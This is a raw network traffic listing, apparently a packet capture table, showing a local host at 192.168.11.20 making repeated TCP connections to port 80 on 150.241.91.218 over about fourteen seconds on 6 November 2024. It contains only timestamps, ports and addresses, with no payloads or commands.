                                                                                                                                                              Nov 6, 2024 17:37:11.850466013 CET4996780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:11.850600004 CET4996880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:11.850744963 CET4996880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:11.850745916 CET4996880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:12.038439035 CET8049968150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:12.038451910 CET8049968150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:12.110637903 CET8049968150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:12.126770973 CET4996880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:12.127317905 CET4996980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:12.314524889 CET8049968150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:12.314697027 CET8049969150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:12.314768076 CET4996880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:12.315000057 CET4996980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:12.315129042 CET4996980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:12.315129042 CET4996980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:12.502692938 CET8049969150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:12.502701998 CET8049969150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:12.570086002 CET8049969150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:12.581427097 CET4996980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:12.581897020 CET4997080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:12.769810915 CET8049969150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:12.770077944 CET4996980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:12.770143032 CET8049970150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:12.770313978 CET4997080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:12.770457029 CET4997080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:12.770457029 CET4997080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:12.958293915 CET8049970150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:12.958326101 CET8049970150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:13.027390003 CET8049970150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:13.037888050 CET4997080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:13.038342953 CET4997180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:13.225990057 CET8049970150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:13.226216078 CET4997080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:13.226243973 CET8049971150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:13.226412058 CET4997180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:13.226532936 CET4997180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:13.226533890 CET4997180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:13.414531946 CET8049971150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:13.414541960 CET8049971150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:13.483297110 CET8049971150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:13.508934975 CET4997180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:13.509474039 CET4997280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:13.696892023 CET8049972150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:13.696906090 CET8049971150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:13.697295904 CET4997180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:13.697299004 CET4997280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:13.697299004 CET4997280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:13.697324991 CET4997280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:13.885515928 CET8049972150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:13.885528088 CET8049972150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:13.955359936 CET8049972150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:13.978065968 CET4997280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:13.978394032 CET4997380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:14.165823936 CET8049972150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:14.166294098 CET4997280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:14.166496992 CET8049973150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:14.166963100 CET4997380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:14.167002916 CET4997380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:14.167002916 CET4997380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:14.354881048 CET8049973150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:14.354892015 CET8049973150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:15.438711882 CET8049973150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:15.449667931 CET4997380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:15.450138092 CET4997480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:15.637672901 CET8049973150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:15.637768984 CET8049974150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:15.637897015 CET4997380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:15.637939930 CET4997480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:15.638092995 CET4997480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:15.638092995 CET4997480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:15.827377081 CET8049974150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:15.827403069 CET8049974150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:15.899550915 CET8049974150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:15.915281057 CET4997480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:15.915793896 CET4997580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:16.103509903 CET8049974150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:16.103832960 CET4997480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:16.103833914 CET8049975150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:16.103998899 CET4997580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:16.104121923 CET4997580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:16.104121923 CET4997580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:16.292467117 CET8049975150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:16.292479038 CET8049975150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:16.356686115 CET8049975150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:16.372900963 CET4997580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:16.373711109 CET4997680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:16.561527014 CET8049975150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:16.561676025 CET4997580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:16.562273979 CET8049976150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:16.562561989 CET4997680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:16.562720060 CET4997680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:16.562720060 CET4997680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:16.751162052 CET8049976150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:16.751179934 CET8049976150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:16.820034981 CET8049976150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:16.830024958 CET4997680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:16.830437899 CET4997780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:17.018002033 CET8049976150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:17.018076897 CET8049977150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:17.018202066 CET4997680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:17.018311977 CET4997780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:17.018426895 CET4997780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:17.018426895 CET4997780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:17.206286907 CET8049977150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:17.206296921 CET8049977150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:17.275743961 CET8049977150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:17.295648098 CET4997780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:17.295954943 CET4997880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:17.483928919 CET8049977150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:17.483942032 CET8049978150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:17.484186888 CET4997880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:17.484188080 CET4997780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:17.484280109 CET4997880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:17.484280109 CET4997880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:17.673188925 CET8049978150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:17.673196077 CET8049978150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:17.739916086 CET8049978150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:17.752439022 CET4997880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:17.752836943 CET4997980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:17.940437078 CET8049978150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:17.940581083 CET4997880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:17.940856934 CET8049979150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:17.941097021 CET4997980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:17.941226006 CET4997980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:17.941226006 CET4997980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:18.129626036 CET8049979150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:18.129647017 CET8049979150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:18.198868036 CET8049979150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:18.210581064 CET4997980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:18.211087942 CET4998080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:18.398953915 CET8049979150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:18.398967981 CET8049980150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:18.399214983 CET4998080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:18.399215937 CET4997980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:18.399301052 CET4998080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:18.399301052 CET4998080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:18.589545012 CET8049980150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:18.589587927 CET8049980150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:18.662683010 CET8049980150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:18.674459934 CET4998080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:18.674915075 CET4998180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:18.863398075 CET8049981150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:18.863460064 CET8049980150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:18.863646984 CET4998180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:18.863647938 CET4998080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:18.863775969 CET4998180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:18.863775969 CET4998180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:19.051955938 CET8049981150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:19.052081108 CET8049981150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:19.119719982 CET8049981150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:19.139601946 CET4998180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:19.140192032 CET4998280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:19.327709913 CET8049982150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:19.327781916 CET8049981150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:19.328032017 CET4998280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:19.328044891 CET4998180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:19.328176022 CET4998280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:19.328176022 CET4998280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:19.526606083 CET8049982150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:19.526669979 CET8049982150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:19.593046904 CET8049982150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:19.604949951 CET4998280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:19.605390072 CET4998380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:19.792721033 CET8049982150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:19.792953968 CET4998280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:19.793895006 CET8049983150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:19.794162989 CET4998380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:19.794296026 CET4998380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:19.794296026 CET4998380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:19.982805014 CET8049983150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:19.982851028 CET8049983150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:20.052242994 CET8049983150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:20.062712908 CET4998380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:20.063131094 CET4998480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:20.251447916 CET8049984150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:20.251490116 CET8049983150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:20.251785040 CET4998380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:20.251785040 CET4998480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:20.251907110 CET4998480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:20.251907110 CET4998480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:20.440114021 CET8049984150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:20.440166950 CET8049984150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:20.510720015 CET8049984150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:20.521744967 CET4998480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:20.522300005 CET4998580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:20.710483074 CET8049984150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:20.710655928 CET4998480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:20.710808992 CET8049985150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:20.711129904 CET4998580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:20.711302042 CET4998580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:20.711302042 CET4998580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:20.899514914 CET8049985150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:20.899559975 CET8049985150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:20.968055010 CET8049985150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:20.988159895 CET4998580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:20.988631964 CET4998680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:21.176173925 CET8049985150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:21.176429033 CET4998580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:21.176899910 CET8049986150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:21.177104950 CET4998680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:21.177288055 CET4998680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:21.177288055 CET4998680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:21.365612030 CET8049986150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:21.365696907 CET8049986150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:21.438956976 CET8049986150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:21.455349922 CET4998680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:21.455802917 CET4998780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:21.643342018 CET8049987150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:21.643610001 CET4998780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:21.643714905 CET8049986150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:21.643876076 CET4998780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:21.643876076 CET4998780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:21.643876076 CET4998680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:21.831825018 CET8049987150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:21.831870079 CET8049987150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:21.900816917 CET8049987150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:21.914403915 CET4998780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:21.914988041 CET4998880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:22.104103088 CET8049987150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:22.104165077 CET8049988150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:22.104274988 CET4998780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:22.104358912 CET4998880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:22.104449987 CET4998880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:22.104499102 CET4998880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:22.296833038 CET8049988150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:22.297843933 CET8049988150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:22.368257999 CET8049988150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:22.379220963 CET4998880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:22.379622936 CET4998980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:22.568511009 CET8049988150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:22.568566084 CET8049989150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:22.568785906 CET4998980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:22.568785906 CET4998880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:22.568953037 CET4998980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:22.568953991 CET4998980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:22.757249117 CET8049989150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:22.757292032 CET8049989150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:22.827124119 CET8049989150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:22.847515106 CET4998980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:22.848021984 CET4999080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:23.036433935 CET8049989150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:23.036446095 CET8049990150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:23.036644936 CET4998980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:23.036674023 CET4999080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:23.036809921 CET4999080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:23.036811113 CET4999080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:23.225094080 CET8049990150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:23.225105047 CET8049990150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:23.294476032 CET8049990150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:23.306282043 CET4999080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:23.306710005 CET4999180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:23.494467974 CET8049990150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:23.494479895 CET8049991150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:23.494673014 CET4999080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:23.494673014 CET4999180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:23.494877100 CET4999180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:23.494877100 CET4999180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:23.683331966 CET8049991150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:23.683341026 CET8049991150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:24.066386938 CET8049991150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:24.080697060 CET4999180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:24.081283092 CET4999280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:24.268826962 CET8049991150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:24.268840075 CET8049992150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:24.269108057 CET4999180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:24.269115925 CET4999280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:24.269316912 CET4999280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:24.269316912 CET4999280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:24.457930088 CET8049992150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:24.457942009 CET8049992150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:24.525968075 CET8049992150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:24.536606073 CET4999280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:24.536897898 CET4999380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:24.724714041 CET8049993150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:24.724812031 CET8049992150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:24.724908113 CET4999380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:24.724984884 CET4999280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:24.725060940 CET4999380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:24.725060940 CET4999380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:24.912786007 CET8049993150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:24.912796974 CET8049993150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:24.983819962 CET8049993150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:24.995368958 CET4999380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:24.995793104 CET4999480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:25.183377981 CET8049993150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:25.183396101 CET8049994150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:25.183662891 CET4999380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:25.183686018 CET4999480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:25.183922052 CET4999480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:25.183922052 CET4999480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:25.371902943 CET8049994150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:25.371915102 CET8049994150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:25.445242882 CET8049994150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:25.457629919 CET4999480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:25.458106041 CET4999580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:25.645790100 CET8049994150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:25.646220922 CET4999480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:25.646353960 CET8049995150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:25.646528006 CET4999580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:25.646702051 CET4999580192.168.11.20150.241.91.218
